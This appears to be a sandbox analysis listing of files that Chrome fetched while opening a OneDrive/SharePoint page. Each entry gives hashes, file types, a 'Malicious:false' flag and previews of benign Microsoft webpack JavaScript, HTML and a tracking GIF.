                                                            Preview:Footprint=function(){var t=1,n=2,e=t|n,r=8,o=16,i=r|o,u=e|i,a=128,f=256,s=e|(a|f),c="http://",l=200,m="trans.gif",p="/apc/",g=5e3,d="trans.gif",h="100k.gif",v=822.128,w=1e3,T="GET",y="POST",M=-1,I="20190214",b="x-userhostaddress",D="x-endpoint",R="x-frontend";function q(t,n,e,r){if(!(n>=t.length)){e!==T&&e!==y&&(e=T);var o=function(){q(t,n+1,e,r)},i=new XMLHttpRequest;i.open(e,t[n],!0),i.onload=function(){4===i.readyState&&200===i.status?null!=r&&r(i):o()},i.onerror=o,i.timeout=g,i.ontimeout=o,i.send()}}function O(t,n){if(t<=0)return t;if(n&i&&t>0){var e=v/(t/w);return Math.round(e)}return Math.round(t)}function x(){function t(){return Math.floor(65536*(1+Math.random())).toString(16).substring(1)}return t()+t()+t()+t()+t()+t()+t()+t()}function H(){return!(!window.performance||!window.performance.getEntriesByName)}return{start:function(e,v,w,y,L){try{if(void 0===y&&(y=""),void 0===L&&(L=""),!e||0===e.trim().length||Number(w)!==w||w%1!=0||w<0)return;var S=L.trim().length>0,A=y.trim().len
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7363)
                                                            Category:downloaded
                                                            Size (bytes):17097
                                                            Entropy (8bit):5.313154977718856
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:231B51A554CEE549C83648355DCEC191
                                                            SHA1:E1CDF503ECEFF8A63C87BE40634B72450BA697C6
                                                            SHA-256:B9574DFCBAC0C9DB001BFBA722A6F8751FCF8435B62AD88D21B6EB7A55DEC8A9
                                                            SHA-512:2E78464B6855C965535228FC0A142576B11CA46315FCD5A4BC99FBF3F8DF825B1D5F06386D69ACA1460A3A6D0F3D70200C2706A2C99167EE43EAE48867288B58
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/328.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[328],{3919:function(e,t,n){n.d(t,{a:function(){return o}});var a=n("tslib_538"),i=n("odsp.util_517"),r=n(3686),o=function(e){function t(t){var n=e.call(this,(0,a.q5)((0,a.q5)({},t),{code:t.code||t.errorType.toString()}))||this,i=t.errorType,o=void 0===i?r.a.unknown:i;return n.errorType=o,n}return(0,a.e2)(t,e),t}(i.qt)}.,3686:function(e,t,n){n.d(t,{a:function(){return a}});var a={invalidArgument:"invalidArgument",serverError:"serverError",unknown:"unknown",unknownItemError:"unknownItemError",warning:"warning",nameConflict:"nameConflict",inSufficientPermission:"inSufficientPermission",moveCopyAccessDenied:"moveCopyAccessDenied",destinationNotFound:"destinationNotFound",moveVersionLimit:"moveVersionLimit",copyPermcheckFailed:"copyPermcheckFailed",notSameLevel:"notSameLevel",invalidDocSetItemMove:"invalidDocSetItemMove",invalidDocSetItemCopy:"invalidDocSetItemCopy",moveFileDeleteFail:"moveFileDeleteFail",moveBloc
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (10451)
                                                            Category:downloaded
                                                            Size (bytes):15727
                                                            Entropy (8bit):5.239190569605211
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0BA7C0A7D39B47CEFCAA445811381736
                                                            SHA1:C034FDB95981D96CC786C00FF36A7CF08E8F2CEE
                                                            SHA-256:6205858F2E5174C345931A24A25D312E5195828F9DA86BB1CCBF9FA156FD50D9
                                                            SHA-512:1B5EBB9BEBFB01A963CCA5A42B224D167E701B9B2261E0749925B36C0E721C0B2591438E71F75518DB7477797F735023B4CE950423E6173B241FE21DFCE9B776
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/6.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[6],{9359:function(e,t,n){n.d(t,{a:function(){return D}});var a,i=n(40),r=n("tslib_538"),o=n("react-lib"),s=n(2613),c=n(82),d=n(29),l=n(131),u=n("fui.util_261"),f=n(147),p=n(1048),m=n(49),_=n(2638),h=(0,d.a)(),b="TextField",g=function(e){function t(t){var n=e.call(this,t)||this;n._textElement=o.createRef(),n._onFocus=function(e){n.props.onFocus&&n.props.onFocus(e),n.setState({isFocused:!0},function(){n.props.validateOnFocusIn&&n._validate(n.value)})},n._onBlur=function(e){n.props.onBlur&&n.props.onBlur(e),n.setState({isFocused:!1},function(){n.props.validateOnFocusOut&&n._validate(n.value)})},n._onRenderLabel=function(e){var t=e.label,a=e.required,i=n._classNames.subComponentStyles?n._classNames.subComponentStyles.label:void 0;return t?o.createElement(s.a,{required:a,htmlFor:n._id,styles:i,disabled:e.disabled,id:n._labelId},e.label):null},n._onRenderDescription=function(e){return e.description?o.createElement(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (3546)
                                                            Category:downloaded
                                                            Size (bytes):4177
                                                            Entropy (8bit):5.381335441559962
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6415875EF10D5CD5510A37A5909A4699
                                                            SHA1:2BCE72A2F2410369EEC5EF25B1A0247B58EDF051
                                                            SHA-256:BC0D6DBC26D6F467414994A67716EB7151E2F5CB8D943763E09DABB7C9BB9D87
                                                            SHA-512:BCFDAD63A60F557EEBBF46A8AED123B5B420AFBDE4AC699FE99BCD2BD1E5BE62F27897BC6531958554FC402FEBF6A53D9EAA88AC7F2F1CBA4460990239A34761
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1530.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1530],{3122:function(e,t,n){n.d(t,{a:function(){return c},b:function(){return s}});var a=n("tslib_538"),i=n("react-lib"),r=n(556),o=n(2606),s=function(e){var t=e.OnDemandFabric,n=e.children,r=e.calloutProps,o=i.useState(!0),s=o[0],c=o[1];return s?i.createElement(t.Callout,(0,a.q5)({},r,{onDismiss:function(){r.onDismiss&&r.onDismiss(),c(!s)}}),n):null},c=(0,r.b)({loader:function(){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(e){switch(e.label){case 0:return[4,(0,o.c)()];case 1:return[2,e.sent().Callout]}})})}})}.,7547:function(e,t,n){n.r(t),n.d(t,{renderCallout:function(){return h},renderErrorInfoCallout:function(){return v},renderReadonlyInfoCallout:function(){return y},renderSelectionInfoCallout:function(){return S},toggleStickyStyle:function(){return D},unmountInfoCallout:function(){return b}});var a=n("tslib_538"),i=n(12),r=n(136),o=n(3390),s=n(2606),c=n(556),d=n(92),l=n(298)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (45402)
                                                            Category:downloaded
                                                            Size (bytes):49641
                                                            Entropy (8bit):5.6362864427658295
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E51BD1175F60931292E8A122339E78CB
                                                            SHA1:7A23734C28443B7AADAE881B2671433E37E63D8F
                                                            SHA-256:AA19940EA52462C11F5903FE1A263EBE550F21815490107CC95FCB2E53DF179F
                                                            SHA-512:18ACDA0E3870E40047164D60FA9960F77EFB2BAC5DF84A4B047D92257F41B6126476D78B6DB85EACEE8D59F4D098F8920748F682D05D4751F9517A26073CE5DF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/296.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[296],{2304:function(e,t,n){n.r(t),n.d(t,{initializeIcons:function(){return E}});var a=n(1377),i=n("fui.util_261");function r(e,t){void 0===e&&(e="");var n={style:{MozOsxFontSmoothing:"grayscale",WebkitFontSmoothing:"antialiased",fontStyle:"normal",fontWeight:"normal",speak:"none"},fontFace:{fontFamily:'"FabricMDL2Icons-0"',src:"url('".concat(e,"odsp-next-icons-0-433a26c6.woff') format('woff')")},icons:{DecreaseIndentLegacy:".",IncreaseIndentLegacy:".",SizeLegacy:".",PageLink:".",DatabaseSource:".",CommentSolid:".",ChangeEntitlements:".",Installation:".",WebAppBuilderModule:".",WebAppBuilderFragment:".",WebAppBuilderSlot:".",BullseyeTargetEdit:".",WebAppBuilderFragmentCreate:".",PageData:".",PageHeaderEdit:".",ProductList:".",UnpublishContent:".",DependencyAdd:".",DependencyRemove:".",EntitlementPolicy:".",EntitlementRedemption:".",SchoolDataSyncLogo:".",BugWarning:"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (20655)
                                                            Category:dropped
                                                            Size (bytes):42457
                                                            Entropy (8bit):5.178807018428117
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A7B6B54D0843B180457DF35FC2624A2E
                                                            SHA1:97BA650C7B77AF11026C3CC440AA4046C1AF43FD
                                                            SHA-256:642D1AC599C38684AE8FDAA2CC540573908B4BC06235CA3B7C7CAC018CAFAFF3
                                                            SHA-512:9BBB95FB72AE13B78B7E5F1235C230E18FD94E4001C8A0CDA3063831E4C0D87A329186317D89474F62DB62F638EB3DB309B7BEF9DA8607FF49CCDAE078D23A4F
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[72,1314],{6815:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(9145),i=function(){function e(e){this._dataSource=e.sharingDataSource||new a.a({getParentListId:e.getParentListId,pageContext:e.pageContext}),this._itemProvider=e.itemProvider}return e.prototype.getSharingInformation=function(e,t,n,a,i){return this._dataSource.getSharingInformation(e,t,n,a,i,void 0)},e.prototype.getSharingInformationForRMA=function(e,t){return this._dataSource.getSharingInformationForRMA(e,t,void 0)},e.prototype.shareLink=function(e){var t=this;return this._dataSource.shareLink(e).then(function(n){return t._invalidateItem(e.items[0]),n})},e.prototype.unshareLink=function(e){var t=this;return this._dataSource.unshareLink(e).then(function(n){return t._invalidateItem(e.item),n})},e.prototype.updatePermissions2=function(e,t,n){var a=this;return this._dataSource.updatePermissions2(e,t,n).then(function(e){return a._invalidateIte
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (59413)
                                                            Category:dropped
                                                            Size (bytes):165485
                                                            Entropy (8bit):5.343614316058922
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6E87842C0AF9E71C5AFA6A752313ACDD
                                                            SHA1:DE13E688E48D38F9A176C77E1CBA6769B940023B
                                                            SHA-256:0F3DB693D79CC69B5C53C6D53B856AF38B4097AE2272046BA415832BA6E8C6EE
                                                            SHA-512:0348E115B6BF65D562AFA13C6BCE28C293CC7A5633ABCAF85F0635FC4B3DB9E8961C4BA2AC7D27EDC845B31702CF9E6C8529756590FCD65D7DCFBC43F0E04E2F
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:/*! For license information please see spwebworker.js.LICENSE.txt */.(()=>{"use strict";var e=[(e,t,n)=>{function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.r(t),n.d(t,{Empty:()=>r,_guidRegEx:()=>o,cryptoRandom:()=>i,generate:()=>s,isValidGuid:()=>u,normalizeDashes:()=>l,normalizeLower:()=>c,normalizeUpper:()=>d});var r="00000000-0000-0000-0000-000000000000",o=/^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$/i;function s(e){var t=[];t.push(a(8,e)),t.push(a(4,e));var n="4"+a(3,e);t.push(n);var i=a(4,e),r=parseInt(i[0],16);return r&=3,i=(r|=8).toString(16)+i.substr(1),t.push(i),t.push(a(12,e)),t.join("-")}function c(e,t){return void 0===t&&(t=!1),e?f(e.toLowerCase(),t):""}function d(e,t){return void 0===t&&(t=!1),e?f(e.toUpperCase(),t):""}function l(e,t){if(void 0===t&&(t=!1),e){var n=e.replace(/[^A-Fa-f0-9]/g,"");if(32===n.length)retu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7031)
                                                            Category:downloaded
                                                            Size (bytes):7081
                                                            Entropy (8bit):5.446040709047887
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B450C2490DC0E987C5228D0B93A63870
                                                            SHA1:4243253527D8E6D886578BD1F68BC4211F70F8A0
                                                            SHA-256:E6D27A0B4A28145F32B3072308FBA0056589612CD1F73AE03D1C5A86D62CD002
                                                            SHA-512:CB42016C26132720C95A823B7CAB88FFA5F05C9580A5F08E837ABAAFF8EF70F4082029B5172E5265E39331D373036DB2E637DA154329FF0B60600A206AE68CBA
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/14.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{3486:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return S},c:function(){return D},d:function(){return y}});var a,i=n("tslib_538"),r=n(2020),o=n(807),s=n(507),c=n(63),d=n(2939),l=n(1939),u=n(3088),f=n("odsp.util_517"),p=n(3007),m=f.x9.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.x9.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!1,isCollapsable:!0,minWidth:16,width:18,type:l.a.ShareCommand},a[d.c.calloutInvoker]={key:"_calloutInvoker",index:3,isVisibleM
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (35235)
                                                            Category:downloaded
                                                            Size (bytes):35550
                                                            Entropy (8bit):5.29421364002058
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:796A8F986BB0F9866ABDC8709C0AA9AC
                                                            SHA1:0855AA665D77E6F3EF161B4EE304A5DB1AA837F2
                                                            SHA-256:5A7C0856A47C240EED0DC1F674AE2F45B074BF2D1FA125CD5A10B7BE1A9AAF2C
                                                            SHA-512:F2141DFB3B108AB242D80CBAB6D10ECD2F7F4E9CCB93FD20E3920391D3B6644D412EEB30BFA518F07E649A344D588C95824D7EDAE23F06C4AAC3A2F534AB8ADA
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/131.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[131],{2624:function(e,t,n){n.d(t,{b:function(){return A},a:function(){return m},c:function(){return b},d:function(){return O},e:function(){return x},f:function(){return D},h:function(){return N},g:function(){return B},i:function(){return _},j:function(){return d},k:function(){return I},l:function(){return y},m:function(){return l},p:function(){return f},n:function(){return p},o:function(){return K},q:function(){return h},r:function(){return R},s:function(){return U},t:function(){return S}});var a,i=n("tslib_538"),r=n(9080),o=/\{\d+\}/g,s=/[\{\}]/g,c=function(){function e(){}return e.format=function(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];if(null===e)throw new Error(r.g.replace("{0}","s"));if(void 0===e)throw new Error(r.h.replace("{0}","s"));return e.replace(o,function(e){var n=parseInt(e.replace(s,""),10),a=t[n];return(n>=t.length||n<0)&&(a=e),null===a?a="null":void 0===a&&(a="undefine
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 1 x 1
                                                            Category:dropped
                                                            Size (bytes):43
                                                            Entropy (8bit):3.0314906788435274
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:325472601571F31E1BF00674C368D335
                                                            SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                            SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                            SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:GIF89a.............!.......,...........D..;
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:C source, ASCII text, with very long lines (11725)
                                                            Category:dropped
                                                            Size (bytes):254125
                                                            Entropy (8bit):5.459944260197349
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B9FB69B311BC8C66AE92AF2FC8F5EBBD
                                                            SHA1:F1D705593E75DA7155FA80387D72327001C7916D
                                                            SHA-256:FE79210F56DFDB2BF217463EE87F8AA8C12098E7085A5332E8051817B840862C
                                                            SHA-512:1D58BA2A9CADB4F59CD07197F6F53F043F8DF5B337D32B14DA9E3E613D8A741BAB44055859DBB0ECCD6F979C0A2428DF8480CA1BCA641E46AB7D5B288994AE5C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:var __webpack_result__;!function(){"use strict";var e={615:function(e,t,n){n.r(t),n.d(t,{__assign:function(){return a.q5},__asyncDelegator:function(){return a.DQ},__asyncGenerator:function(){return a.$0},__asyncValues:function(){return a.Gl},__await:function(){return a.HE},__awaiter:function(){return a.yv},__classPrivateFieldGet:function(){return a.J4},__classPrivateFieldSet:function(){return a._7},__createBinding:function(){return a.ic},__decorate:function(){return a.j0},__exportStar:function(){return a.tI},__extends:function(){return a.e2},__generator:function(){return a.SO},__importDefault:function(){return a.Zu},__importStar:function(){return a.VE},__makeTemplateObject:function(){return a.zH},__metadata:function(){return a.Hu},__param:function(){return a.Rd},__read:function(){return a.pM},__rest:function(){return a.dc},__spread:function(){return a.Hr},__spreadArray:function(){return a.lt},__spreadArrays:function(){return a.Ej},__values:function(){return a.BW}});var a=n("tslib_538")
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4142)
                                                            Category:dropped
                                                            Size (bytes):9804
                                                            Entropy (8bit):5.196780933228096
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F99F9ECA9FBBC29B12FA397857941877
                                                            SHA1:CF3B3C6073F793127F55EB489EFBD744B3ECB61F
                                                            SHA-256:C8413686615BCEDE4D2CD778AC1749131F1B7A8E01CD1CE4ECDC0466680616CA
                                                            SHA-512:BE1A6D17DC3370D33995C1924237248CBEEB74B0F8A9C532D39EBA6AFF45DAB1D9ECC6C7AE0F36D0F95DF5CCC34B706491F4E2074C04274F2C22FEF50532058E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[357,2166],{2581:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="malw
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (56786), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):349767
                                                            Entropy (8bit):5.889694351388486
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:85387AC0191AEF279065AB5397D55074
                                                            SHA1:24BDEC0C5FDB146AFE559BB835C9A41BF60E4F81
                                                            SHA-256:CA443FDD1AE5ADE63BEA4AEE5B236330AFBA1B939C9E60EC730A3980A32FFA55
                                                            SHA-512:6CD20BBADCD33423765DA858505F7FB384E09FBB4F795C3C4CA9E07D56A9722C1D7A38FDAFF7AA03EF793F956E95CC9EA62C65B2FD8359B29BE5BA944E613E56
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://timecusa-my.sharepoint.com/personal/stephensw_timecusa_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fstephensw%5Ftimecusa%5Fcom%2FDocuments%2FBenefit%20Policy&ga=1
                                                            Preview:..<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head><meta name="GENERATOR" content="Microsoft SharePoint" /><meta http-equiv="Content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Expires" content="0" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /><title>...OneDrive..</title><link rel="shortcut icon" href="/_layouts/15/images/odbfavicon.ico?rev=47" type="image/vnd.microsoft.icon" id="favicon" /></head>.. <body style="margin: 0; padding: 0;">.. <script nonce= 'ba9959ae-1356-4d16-a628-3925f214e1ec' >if(!spfxPerfMarks){var spfxPerfMarks = {};} var markPerfStage=function(key) {if(window.performance && typeof window.performance.now === 'function'){spfxPerfMarks[key]=window.performance.now();} else{spfxPerfMarks[key]=Date.now();} if (window.performance && typeof window.performance.mark === 'function') {window.performance.mark(key);}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48561)
                                                            Category:dropped
                                                            Size (bytes):51642
                                                            Entropy (8bit):5.255276092965737
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:52FF42DD065AD3C6EC4CAC714D1E7949
                                                            SHA1:68CCA2568A63848D13803707802709C9EB88CA32
                                                            SHA-256:6432104FBEC3AD938F102CF487EEDFDDBBA871883FBEB5C0DF8CAFF0D9A3D2E4
                                                            SHA-512:B79D9AE4849635C1D6F8C57DEEBD89681401A2A870401781F972D663D229304C8A7DA8F33BE2420A53968A23CB1C15E19368ED2AEDC46231583B2F469981648B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_responsive_start"),(self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]=self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]||[]).push([["responsive"],{1840:function(e,t,n){(t=e.exports=n(3707)(!1)).push([e.id,"html[dir=rtl] ._7PGqXIlT8jItdB8fOBmFkg\\=\\={transform:scaleX(-1);-moz-transform:scaleX(-1);-webkit-transform:scaleX(-1);-ms-transform:scaleX(-1)}",""]),t.locals={iconFontRTL:"_7PGqXIlT8jItdB8fOBmFkg=="}},393:function(e,t,n){(t=e.exports=n(3707)(!1)).push([e.id,'.M3pcB5evSAtYMozck1WU7A\\=\\={height:100%;line-height:48px;display:flex}._1QSK5lUhw5Gkh7SDz97ZPQ\\=\\={height:48px;display:flex}.siUMOJwnumycxvszBe3uzQ\\=\\={display:inherit;flex:inherit;justify-content:inherit;order:inherit;align-self:inherit;min-width:inherit}.\\/DyMYj2gNfPrYNbEWoV2\\/w\\=\\={font-size:14px;font-family:Segoe
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47520)
                                                            Category:dropped
                                                            Size (bytes):47521
                                                            Entropy (8bit):5.3981340461317835
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (24832)
                                                            Category:downloaded
                                                            Size (bytes):25137
                                                            Entropy (8bit):5.49878093685399
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4B4E242B36F285D37FD0977A4149702A
                                                            SHA1:1FED50E910116CC793C2E1778C8AEE204F2C61B4
                                                            SHA-256:C9757810BF535AE27FCECE6715BCE17B362215B13FB19B8B18CD3AA8CFB82689
                                                            SHA-512:DAFA4E93101F4C4204DCA8DAC128A083001E8ACC23279705B91D84AF735455880D7FD55D3C2F0952B8779FB4F9DDBD590108C7EF624737BD4B9A50C3C1C9DCFB
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/294.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[294],{2259:function(e,t,n){n.r(t),n.d(t,{FloodgateDataSource:function(){return ae},resourceKey:function(){return ie}});var a={};n.r(a),n.d(a,{AllPhotosFPSSurvey:function(){return R},FPSCampaignForDocLib:function(){return b},FPSCampaignForDocLibDebug:function(){return g},NPSCampaignDebugForSPO:function(){return P},NPSCampaignDebugForSPOSharedialog:function(){return T},NPSCampaignDogfood:function(){return E},NPSCampaignForLists:function(){return m.b},NPSCampaignForListsDebug:function(){return m.a},NPSCampaignForSPO:function(){return U},NPSCampaignForSPOSharedialog:function(){return F},NPSCampaignForceNomination:function(){return A},NPSCampaignODCPaywall:function(){return O},NPSCampaignProd:function(){return w},NPSSuiteSurvey:function(){return H},NlqsSurveyForBigLangs:function(){return z},NlqsSurveyForMediumLangs:function(){return G},NlqsSurveyForSmallLangs:function(){return K},ODBCopyFPSSurvey:function(){return
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (57807)
                                                            Category:downloaded
                                                            Size (bytes):83903
                                                            Entropy (8bit):5.271810491179016
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:64E9F7DFDCD7BAB9468B4699B21789B5
                                                            SHA1:8E930AFB16D44279E619403EF32CFC4E12E5E3C1
                                                            SHA-256:0AA7EA0694E7C63CD60251842E98B0398991C78F265681B23FF1BEAA03A3EDD7
                                                            SHA-512:09EC97700002E3FBE25EA454258107F180D90A8D57C7D7B4C2A5F7F3E41173AC15685A7E21DB95A7D876504442B399CB4B535E94A67F9FC9AAFA60F5D217FA34
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/126.js
